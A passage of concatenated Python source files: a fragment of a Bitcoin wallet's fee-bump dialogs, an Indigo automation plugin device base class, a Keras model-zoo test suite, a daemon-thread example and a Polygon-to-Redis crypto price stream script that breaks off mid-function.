fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) 
fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) # new_tx.set_rbf(True) new_tx.set_rbf(False) self.show_transaction(new_tx) def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() assert txid fee = self.wallet.get_tx_fee(txid) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label(txid) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit())) vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate))) vbox.addWidget(QLabel(_('New Fee rate') + ':')) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) vbox.addWidget(feerate_e) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_slider.deactivate() vbox.addWidget(fee_slider) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate) except CannotBumpFee as 
e: self.show_error(str(e)) return #if is_final: # new_tx.set_rbf(True) new_tx.set_rbf(False) self.show_transaction(new_tx, tx_label) def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True
# ====================== RPFrameworkDevice.py ======================
#! /usr/bin/env python # -*- coding: utf-8 -*- #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkDevice by RogueProeliator <adam.d.ashe@gmail.com> # Base class for all RogueProeliator's devices created by plugins for Perceptive # Automation's Indigo software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # Version 0: # Initial release of the device framework # Version 4: # Added support for child devices # Version 8: # Added support for reconnection attempts via plugin's command queue # Version 13: # Added ability to specify new device states that are added via upgrades; if any # of these states don't exist at device started, the device states will be reloaded # via a call to stateListOrDisplayStateIdChanged # Version 17: # Added unicode support # Changed error messages to the new plugin-based logErrorMessage # #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # Python imports #///////////////////////////////////////////////////////////////////////////////////////// import functools import indigo import Queue import random import threading import time import RPFrameworkCommand import RPFrameworkPlugin import RPFrameworkThread import RPFrameworkUtils 
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////


#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkDevice
# Base class for Indigo plugin devices that provides standard functionality such as
# multi-threaded communications and attribute management
#/////////////////////////////////////////////////////////////////////////////////////////
class RPFrameworkDevice(object):

    #/////////////////////////////////////////////////////////////////////////////////////
    # Class construction and destruction methods
    #/////////////////////////////////////////////////////////////////////////////////////
    def __init__(self, plugin, device):
        """Zero out member state; called when the plugin starts device communication."""
        self.hostPlugin = plugin
        self.indigoDevice = device
        self.childDevices = dict()
        # random id distinguishes this in-memory instance (used to validate reconnects)
        self.deviceInstanceIdentifier = random.getrandbits(16)
        self.dbConn = None
        self.commandQueue = Queue.Queue()
        self.concurrentThread = None
        self.failedConnectionAttempts = 0
        self.emptyQueueProcessingThreadSleepTime = 0.1
        self.upgradedDeviceStates = list()
        self.upgradedDeviceProperties = list()

    #/////////////////////////////////////////////////////////////////////////////////////
    # Validation and GUI functions
    #/////////////////////////////////////////////////////////////////////////////////////
    def getConfigDialogMenuItems(self, filter, valuesDict, typeId, targetId):
        """Return a dynamic list of elements for an action (or other ConfigUI) routine."""
        return []

    #/////////////////////////////////////////////////////////////////////////////////////
    # Public communication-interface methods
    #/////////////////////////////////////////////////////////////////////////////////////
    def initiateCommunications(self, initializeConnect=True):
        """Start communications with the hardware device, applying any pending
        property/state upgrades, then spin up the concurrent processing thread."""
        # back-fill any plugin properties added during device/plugin upgrades
        propertiesDictUpdateRequired = False
        pluginPropsCopy = self.indigoDevice.pluginProps
        for newPropertyDefn in self.upgradedDeviceProperties:
            if not (newPropertyDefn[0] in pluginPropsCopy):
                self.hostPlugin.logger.info(u'Triggering property update due to missing device property: ' + RPFrameworkUtils.to_unicode(newPropertyDefn[0]))
                pluginPropsCopy[newPropertyDefn[0]] = newPropertyDefn[1]
                propertiesDictUpdateRequired = True

                # safeguard in case the device doesn't get updated...
                self.indigoDevice.pluginProps[newPropertyDefn[0]] = newPropertyDefn[1]
        if propertiesDictUpdateRequired:
            self.indigoDevice.replacePluginPropsOnServer(pluginPropsCopy)

        # reload the state list if any upgrade-defined state is missing
        stateReloadRequired = False
        for newStateName in self.upgradedDeviceStates:
            if not (newStateName in self.indigoDevice.states):
                self.hostPlugin.logger.info(u'Triggering state reload due to missing device state: ' + RPFrameworkUtils.to_unicode(newStateName))
                stateReloadRequired = True
        if stateReloadRequired:
            self.indigoDevice.stateListOrDisplayStateIdChanged()

        # start the concurrent processing thread by injecting a placeholder
        # command into the queue
        if initializeConnect:
            self.queueDeviceCommand(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_INITIALIZE_CONNECTION))

    def terminateCommunications(self):
        """Shut down communications with the hardware device and join the worker thread."""
        self.hostPlugin.logger.debug(u'Initiating shutdown of communications with ' + RPFrameworkUtils.to_unicode(self.indigoDevice.name))
        if not (self.concurrentThread is None) and self.concurrentThread.isAlive():
            self.concurrentThread.terminateThread()
            self.concurrentThread.join()
        self.concurrentThread = None
        self.hostPlugin.logger.debug(u'Shutdown of communications with ' + RPFrameworkUtils.to_unicode(self.indigoDevice.name) + u' complete')

    #/////////////////////////////////////////////////////////////////////////////////////
    # Queue and command processing methods
    #/////////////////////////////////////////////////////////////////////////////////////
    def queueDeviceCommand(self, command):
        """Add a command to the queue polled by concurrentCommandProcessingThread,
        (re)starting the worker thread if it is not running."""
        self.commandQueue.put(command)

        # if connection to the device has not started, or has timed out, then start up a
        # concurrent thread to handle communications
        if self.concurrentThread is None or self.concurrentThread.isAlive() == False:
            self.concurrentThread = RPFrameworkThread.RPFrameworkThread(target=functools.partial(self.concurrentCommandProcessingThread, self.commandQueue))
            self.concurrentThread.start()

    def queueDeviceCommands(self, commandList):
        """Queue a list of commands, preserving their order."""
        for rpCmd in commandList:
            self.queueDeviceCommand(rpCmd)

    def concurrentCommandProcessingThread(self, commandQueue):
        """Worker-thread loop that drains the command queue; overridden by subclasses."""
        pass

    def scheduleReconnectionAttempt(self):
        """Schedule a reconnection via the plugin command queue; reconnects are disabled
        unless enabled through the GUI configuration (attempt limit > 0)."""
        self.hostPlugin.logger.debug(u'Scheduling reconnection attempt...')
        try:
            self.failedConnectionAttempts = self.failedConnectionAttempts + 1
            maxReconnectAttempts = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_LIMIT, u'0'))
            if self.failedConnectionAttempts > maxReconnectAttempts:
                self.hostPlugin.logger.debug(u'Maximum reconnection attempts reached (or not allowed) for device ' + RPFrameworkUtils.to_unicode(self.indigoDevice.id))
            else:
                reconnectAttemptDelay = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_DELAY, u'60'))
                reconnectAttemptScheme = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_SCHEME, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_SCHEME_REGRESS)

                # fixed scheme waits a constant delay; regressive scheme backs off
                # linearly with the number of failed attempts
                if reconnectAttemptScheme == RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_SCHEME_FIXED:
                    reconnectSeconds = reconnectAttemptDelay
                else:
                    reconnectSeconds = reconnectAttemptDelay * self.failedConnectionAttempts
                reconnectAttemptTime = time.time() + reconnectSeconds

                self.hostPlugin.pluginCommandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_DEVICE_RECONNECT, commandPayload=(self.indigoDevice.id, self.deviceInstanceIdentifier, reconnectAttemptTime)))
                self.hostPlugin.logger.debug(u'Reconnection attempt scheduled for ' + RPFrameworkUtils.to_unicode(reconnectSeconds) + u' seconds')
        except Exception:
            # BUGFIX: original read "except e:" which referenced an undefined name and
            # raised NameError whenever the handler fired, masking the real failure
            self.hostPlugin.logger.error(u'Failed to schedule reconnection attempt to device')

    #/////////////////////////////////////////////////////////////////////////////////////
    # Device hierarchy (parent/child relationship) routines
    #/////////////////////////////////////////////////////////////////////////////////////
    def getChildDeviceKeyByDevice(self, device):
        """Generate the key for the managed child-devices dictionary; the format comes
        from this (parent) device's GUI config and defaults to the child's ID."""
        childDeviceKey = self.hostPlugin.substituteIndigoValues(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_CHILDDICTIONARYKEYFORMAT, u''), device, None)
        if childDeviceKey == u'':
            childDeviceKey = RPFrameworkUtils.to_unicode(device.indigoDevice.id)
        return childDeviceKey

    def addChildDevice(self, device):
        """Add an RPFrameworkDevice descendant to this device's managed children."""
        self.hostPlugin.logger.threaddebug(u'Adding child device ' + RPFrameworkUtils.to_unicode(device.indigoDevice.id) + u' to ' + RPFrameworkUtils.to_unicode(self.indigoDevice.id))

        # the key into the dictionary will be specified by the GUI configuration variable
        childDeviceKey = self.getChildDeviceKeyByDevice(device)
        self.hostPlugin.logger.threaddebug(u'Created device key: ' + childDeviceKey)

        # add the device to the list of those managed by this device...
        self.childDevices[childDeviceKey] = device

    def removeChildDevice(self, device):
        """Remove a child from the managed list; the plugin still handles the child's
        own lifecycle calls."""
        self.hostPlugin.logger.threaddebug(u'Removing child device ' + RPFrameworkUtils.to_unicode(device.indigoDevice.id) + u' from ' + RPFrameworkUtils.to_unicode(self.indigoDevice.id))

        # the key into the dictionary will be specified by the GUI configuration variable
        childDeviceKey = self.getChildDeviceKeyByDevice(device)

        # remove the device...
        del self.childDevices[childDeviceKey]

    #/////////////////////////////////////////////////////////////////////////////////////
    # Utility routines
    #/////////////////////////////////////////////////////////////////////////////////////
    def reloadIndigoDevice(self):
        """Re-fetch this device from the Indigo database (e.g. to pick up new states)."""
        self.indigoDevice = indigo.devices[self.indigoDevice.id]

    def updateStatesForDevice(self, statesToUpdate):
        """Apply a list of {'key', 'value'} state updates locally and on the server."""
        for updateValue in statesToUpdate:
            self.indigoDevice.states[updateValue["key"]] = updateValue["value"]
        self.indigoDevice.updateStatesOnServer(statesToUpdate)
# ====================== applications_test.py ======================
"""Smoke tests for the `keras.applications` model zoo.

Each test instantiates a model architecture (with no pre-trained weights,
except where noted) and checks only the statically-known output shape, so the
suite exercises graph construction rather than training or inference.
"""
import pytest
import numpy as np
import time
import random
import os
from multiprocessing import Process, Queue
from keras.utils.test_utils import keras_test
from keras.utils.test_utils import layer_test
from keras.utils.generic_utils import CustomObjectScope
from keras.models import Sequential
from keras import applications
from keras import backend as K

# Skip the whole module unless CI marked the core library or the applications
# code as modified.  `.get` with a 'True' default keeps the module importable
# outside CI (the previous os.environ[...] lookup raised KeyError when the
# variables were unset); behavior is unchanged whenever both variables are set.
pytestmark = pytest.mark.skipif(
    os.environ.get('CORE_CHANGED', 'True') == 'False' and
    os.environ.get('APP_CHANGED', 'True') == 'False',
    reason='runs only when the relevant files have been modified')

# (constructor, channel count of the final convolutional feature map) pairs;
# a random member is picked per test run to keep the suite fast.
DENSENET_LIST = [(applications.DenseNet121, 1024),
                 (applications.DenseNet169, 1664),
                 (applications.DenseNet201, 1920)]
NASNET_LIST = [(applications.NASNetMobile, 1056),
               (applications.NASNetLarge, 4032)]


def clean_run(model_fn):
    """Build the model returned by ``model_fn`` and return its output shape.

    On the CNTK backend the model is created in a subprocess so that the
    memory consumed by large models (e.g. InceptionResNetV2) is released back
    to the system afterwards (works around OOM errors until a memory-clearing
    mechanism is implemented in the CNTK backend).
    """
    if K.backend() == 'cntk':
        def target(queue):
            model = model_fn()
            queue.put(model.output_shape)

        queue = Queue()
        p = Process(target=target, args=(queue,))
        p.start()
        p.join()
        # An error in the subprocess does not propagate here, so model
        # creation succeeded iff a shape was placed on the queue.
        assert not queue.empty(), 'Model creation failed.'
        return queue.get_nowait()
    else:
        model = model_fn()
        return model.output_shape


@keras_test
def test_resnet50():
    model = applications.ResNet50(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
def test_resnet50_notop():
    model = applications.ResNet50(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, 2048)


@keras_test
def test_resnet50_variable_input_channels():
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = applications.ResNet50(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 2048)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = applications.ResNet50(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 2048)


@keras_test
def test_resnet50_pooling():
    model = applications.ResNet50(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, 2048)


@keras_test
def test_vgg16():
    model = applications.VGG16(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
def test_vgg16_notop():
    model = applications.VGG16(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, 512)


@keras_test
def test_vgg16_variable_input_channels():
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = applications.VGG16(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 512)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = applications.VGG16(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 512)


@keras_test
def test_vgg16_pooling():
    model = applications.VGG16(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, 512)


@keras_test
def test_vgg19():
    model = applications.VGG19(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
def test_vgg19_notop():
    model = applications.VGG19(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, 512)


@keras_test
def test_vgg19_variable_input_channels():
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = applications.VGG19(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 512)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = applications.VGG19(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 512)


@keras_test
def test_vgg19_notop_specified_input_shape():
    input_shape = (3, 300, 300) if K.image_data_format() == 'channels_first' else (300, 300, 3)
    model = applications.VGG19(weights=None, include_top=False, input_shape=input_shape)
    output_shape = (None, 512, 9, 9) if K.image_data_format() == 'channels_first' else (None, 9, 9, 512)
    assert model.output_shape == output_shape


@keras_test
def test_vgg19_pooling():
    # Fixed copy-paste bug: this test previously instantiated VGG16.
    model = applications.VGG19(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, 512)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='Requires TensorFlow backend')
def test_xception():
    model = applications.Xception(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='Requires TensorFlow backend')
def test_xception_notop():
    model = applications.Xception(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, 2048)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='Requires TensorFlow backend')
def test_xception_pooling():
    model = applications.Xception(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, 2048)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='Requires TensorFlow backend')
def test_xception_variable_input_channels():
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = applications.Xception(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 2048)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = applications.Xception(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 2048)


@keras_test
def test_inceptionv3():
    model = applications.InceptionV3(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
def test_inceptionv3_notop():
    model = applications.InceptionV3(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, 2048)


@keras_test
def test_inceptionv3_pooling():
    model = applications.InceptionV3(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, 2048)


@keras_test
@pytest.mark.skipif((K.backend() == 'cntk'),
                    reason='cntk does not support padding with non-concrete dimension')
def test_inceptionv3_variable_input_channels():
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = applications.InceptionV3(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 2048)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = applications.InceptionV3(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 2048)


@keras_test
def test_inceptionresnetv2():
    def model_fn():
        return applications.InceptionResNetV2(weights=None)

    output_shape = clean_run(model_fn)
    assert output_shape == (None, 1000)


@keras_test
def test_inceptionresnetv2_notop():
    def model_fn():
        return applications.InceptionResNetV2(weights=None, include_top=False)

    output_shape = clean_run(model_fn)
    if K.image_data_format() == 'channels_first':
        assert output_shape == (None, 1536, None, None)
    else:
        assert output_shape == (None, None, None, 1536)


@keras_test
def test_inceptionresnetv2_pooling():
    def model_fn():
        return applications.InceptionResNetV2(weights=None, include_top=False, pooling='avg')

    output_shape = clean_run(model_fn)
    assert output_shape == (None, 1536)


@keras_test
def test_inceptionresnetv2_variable_input_channels():
    def model_fn(input_shape):
        return applications.InceptionResNetV2(weights=None, include_top=False, input_shape=input_shape)

    output_shape = clean_run(lambda: model_fn((None, None, 1)))
    assert output_shape == (None, None, None, 1536)
    output_shape = clean_run(lambda: model_fn((None, None, 4)))
    assert output_shape == (None, None, None, 1536)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='MobileNets are supported only on TensorFlow')
def test_mobilenet():
    model = applications.MobileNet(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='MobileNets are supported only on TensorFlow')
def test_mobilenet_no_top():
    model = applications.MobileNet(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, 1024)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='MobileNets are supported only on TensorFlow')
def test_mobilenet_pooling():
    model = applications.MobileNet(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, 1024)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='MobileNets are supported only on TensorFlow')
def test_mobilenet_variable_input_channels():
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = applications.MobileNet(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 1024)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = applications.MobileNet(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, 1024)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='MobileNets are supported only on TensorFlow')
def test_mobilenet_image_size():
    # MobileNet ships pre-trained weights only for these square input sizes.
    valid_image_sizes = [128, 160, 192, 224]
    for size in valid_image_sizes:
        input_shape = (size, size, 3) if K.image_data_format() == 'channels_last' else (3, size, size)
        model = applications.MobileNet(input_shape=input_shape, weights='imagenet', include_top=True)
        assert model.input_shape == (None,) + input_shape

    invalid_image_shape = (112, 112, 3) if K.image_data_format() == 'channels_last' else (3, 112, 112)
    with pytest.raises(ValueError):
        model = applications.MobileNet(input_shape=invalid_image_shape, weights='imagenet', include_top=True)


@keras_test
def test_densenet():
    random.seed(time.time())
    fun, _ = random.choice(DENSENET_LIST)

    def model_fn():
        return fun(weights=None)

    output_shape = clean_run(model_fn)
    assert output_shape == (None, 1000)


@keras_test
def test_densenet_no_top():
    random.seed(time.time())
    fun, dim = random.choice(DENSENET_LIST)

    def model_fn():
        return fun(weights=None, include_top=False)

    output_shape = clean_run(model_fn)
    assert output_shape == (None, None, None, dim)


@keras_test
def test_densenet_pooling():
    random.seed(time.time())
    fun, dim = random.choice(DENSENET_LIST)

    def model_fn():
        return fun(weights=None, include_top=False, pooling='avg')

    output_shape = clean_run(model_fn)
    # Fixed: with pooling='avg' the spatial axes are collapsed by global
    # average pooling, so the output is 2-D -- the previous 4-D expectation
    # (None, None, None, dim) could never match.
    assert output_shape == (None, dim)


@keras_test
def test_densenet_variable_input_channels():
    random.seed(time.time())
    fun, dim = random.choice(DENSENET_LIST)

    def model_fn(input_shape):
        return fun(weights=None, include_top=False, input_shape=input_shape)

    output_shape = clean_run(lambda: model_fn((None, None, 1)))
    assert output_shape == (None, None, None, dim)
    output_shape = clean_run(lambda: model_fn((None, None, 4)))
    assert output_shape == (None, None, None, dim)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='NASNets are supported only on TensorFlow')
def test_nasnet():
    random.seed(time.time())
    fun, _ = random.choice(NASNET_LIST)
    model = fun(weights=None)
    assert model.output_shape == (None, 1000)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='NASNets are supported only on TensorFlow')
def test_nasnet_no_top():
    random.seed(time.time())
    fun, dim = random.choice(NASNET_LIST)
    model = fun(weights=None, include_top=False)
    assert model.output_shape == (None, None, None, dim)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='NASNets are supported only on TensorFlow')
def test_nasnet_pooling():
    random.seed(time.time())
    fun, dim = random.choice(NASNET_LIST)
    model = fun(weights=None, include_top=False, pooling='avg')
    assert model.output_shape == (None, dim)


@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='NASNets are supported only on TensorFlow')
def test_nasnet_variable_input_channels():
    random.seed(time.time())
    fun, dim = random.choice(NASNET_LIST)
    input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1)
    model = fun(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, dim)
    input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4)
    model = fun(weights=None, include_top=False, input_shape=input_shape)
    assert model.output_shape == (None, None, None, dim)


@pytest.mark.skipif(K.backend() != 'tensorflow', reason='Requires TF backend')
@keras_test
def test_depthwise_conv_2d():
    """Exercise the DepthwiseConv2D layer shipped with MobileNet."""
    _convolution_paddings = ['valid', 'same']
    num_samples = 2
    stack_size = 3
    num_row = 7
    num_col = 6

    with CustomObjectScope({'relu6': applications.mobilenet.relu6,
                            'DepthwiseConv2D': applications.mobilenet.DepthwiseConv2D}):
        for padding in _convolution_paddings:
            for strides in [(1, 1), (2, 2)]:
                for multiplier in [1, 2]:
                    # 'same' padding with non-unit strides is unsupported here.
                    if padding == 'same' and strides != (1, 1):
                        continue
                    layer_test(applications.mobilenet.DepthwiseConv2D,
                               kwargs={'kernel_size': (3, 3),
                                       'padding': padding,
                                       'strides': strides,
                                       'depth_multiplier': multiplier},
                               input_shape=(num_samples, num_row, num_col, stack_size))
                    layer_test(applications.mobilenet.DepthwiseConv2D,
                               kwargs={'kernel_size': 3,
                                       'padding': padding,
                                       'data_format': 'channels_first',
                                       'activation': None,
                                       'depthwise_regularizer': 'l2',
                                       'bias_regularizer': 'l2',
                                       'activity_regularizer': 'l2',
                                       'depthwise_constraint': 'unit_norm',
                                       'strides': strides,
                                       'depth_multiplier': multiplier},
                               input_shape=(num_samples, stack_size, num_row, num_col))

        # Test invalid use case: a fully-unknown channel dimension must raise.
        with pytest.raises(ValueError):
            model = Sequential([applications.mobilenet.DepthwiseConv2D(kernel_size=3,
                                                                       padding=padding,
                                                                       batch_input_shape=(None, None, 5, None))])


if __name__ == '__main__':
    pytest.main([__file__])
Chap10_Example10.19.py
from threading import Thread daemonchk = False def disp(): if daemonchk: print('Display function only if it is daemon thread') else: print("Non-daemon thread") threadobj = Thread(target = disp) print("Before setting thread as daemon: ", threadobj.daemon) threadobj.daemon = True if threadobj.daemon: daemonchk = True threadobj.start()
crypto_stream.py
import polygon
from polygon import StreamClient, enums
import datetime
# NOTE(review): this rebinds the name "datetime" from the module to the class;
# all uses below rely on the class form (datetime.utcnow / utcfromtimestamp).
from datetime import datetime
import time
import threading
import config
import traceback
import requests
import redis
import json

print("starting stream...")

# Polygon.io API key, kept out of source control in config.py.
key = config.polygon_key


def connections():
    """Create the Redis client (over a unix domain socket) and return it."""
    # redis_pool = redis.ConnectionPool(host=config.redis_host, port=config.redis_port, db=0, password=config.redis_pw)
    redis_pool = redis.ConnectionPool(connection_class=redis.UnixDomainSocketConnection, path="/var/run/redis/redis-server.sock", password=config.redis_pw, db=0)
    r = redis.Redis(connection_pool=redis_pool, charset="utf-8", decode_responses=True)
    print('redis connected', r, redis_pool)
    return r


def redis_message(messages):
    """Append each message, JSON-encoded, to the 'crypto-list' Redis list.

    Relies on the module-global ``r`` assigned in the __main__ block.
    """
    for message in messages:
        r.rpush('crypto-list', json.dumps(message))
    return None


def unix_convert(ts):
    """Convert a millisecond epoch timestamp to a 'YYYY-MM-DD HH:MM:SS' UTC string."""
    ts = int(ts/1000)
    tdate = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
    return tdate


def save_data(message):
    """Normalize a batch of per-minute crypto aggregates and push them to Redis.

    ``message`` is a list of dicts as delivered by the Polygon websocket;
    short field names are renamed to descriptive column names.
    """
    z = time.time()  # start time, for the handler-latency print below
    # Mapping from Polygon's short field names to our column names.
    keys = {'pair': 'pair', 'v': 'tick_volume', 'vw': 'tick_vwap', 'z': 'avg_trade_size', 'o': 'tick_open', 'c': 'tick_close', 'h': 'tick_high', 'l': 'tick_low', 's': 'time_beg', 'e': 'time_end'}
    # Drop Unknown Keys -- the +1 accounts for the event-type field 'ev',
    # which is always present but intentionally not mapped.
    key_count = len(message[0].keys())
    if key_count > len(keys.keys())+1:
        message = [{k: single[k] for k in keys if k in single} for single in message]
        print('New fields detected! Check API documentation: https://polygon.io/docs/websockets/')
    else:
        message = [{k: single[k] for k in keys if k in single} for single in message]
    new_message = []
    for d in message:
        # del d['ev'] # delete status
        d = {keys[name]: val for name, val in d.items()}
        d['tdate'] = unix_convert(d['time_end'])
        d['save_date'] = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
        # Fix the column order before handing off to Redis.
        cols = ['pair', 'tick_volume', 'tick_vwap', 'avg_trade_size', 'tick_open', 'tick_close', 'tick_high', 'tick_low', 'time_beg', 'time_end', 'tdate', 'save_date']
        d = {k: d[k] for k in cols}
        new_message.append(d)
    redis_message(new_message)
    # print(message)
    print(datetime.utcnow(), 'crypto', time.time()-z)
    return None


def my_custom_process_message(ws, msg):
    """Websocket callback: hand every non-status frame to save_data on a worker thread."""
    message = json.loads(msg)
    if message[0]['ev'] != 'status':
        threading.Thread(target=save_data, args=[message]).start()
    return None


def my_custom_error_handler(ws, error):
    """Websocket error callback; escalates the error to the stream thread."""
    raise ValueError('an error happened:', error)


def my_custom_close_handler(ws, close_code, close_msg):
    """Websocket close callback; just logs the close event."""
    print("closed connection", close_code, close_msg)
    return None


def main():
    """Open the Polygon crypto stream and subscribe to minute aggregates."""
    # my_client = polygon.StreamClient(key, polygon.enums.StreamCluster('stocks'), on_message=my_custom_process_message,
